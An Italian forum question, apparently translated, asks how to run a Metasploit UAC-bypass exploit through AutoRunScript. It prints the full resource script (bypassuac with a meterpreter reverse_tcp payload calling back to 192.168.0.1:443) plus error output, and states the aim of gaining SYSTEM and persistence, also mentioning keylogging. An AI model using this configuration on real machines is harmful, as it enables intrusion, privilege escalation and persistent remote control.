C'è un modo per eseguire exploit che richiedono parametri, come quello nel titolo, usando AutoRunScript?
Sono riuscito a utilizzare AutoRunScript per eseguire perfettamente alcuni comandi di post, come keylog_recorder
o checkvm
.
Ma quando ho aggiunto il mio script questo:
use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit
Ho capito:
[*] Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*] Running command set TARGET 0
[-] Unknown command: set.
[*] Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.
Chiaramente mi manca qualcosa qui. Come posso fare questo? Il mio obiettivo è quello di essere in grado di bypassare UAC, utilizzare getsystem e quindi ottenere un punto d'appoggio utilizzando le opzioni di persistenza.
Come nota a margine, capisco che l'utilizzo di "imposta SESSIONE 1" funzionerà solo per il primo computer nel coinvolgimento. Avrei bisogno di usare in qualche modo una variabile per fare riferimento alla sessione attualmente in fase di avvio.
Qualcuno ha qualche soluzione per questo?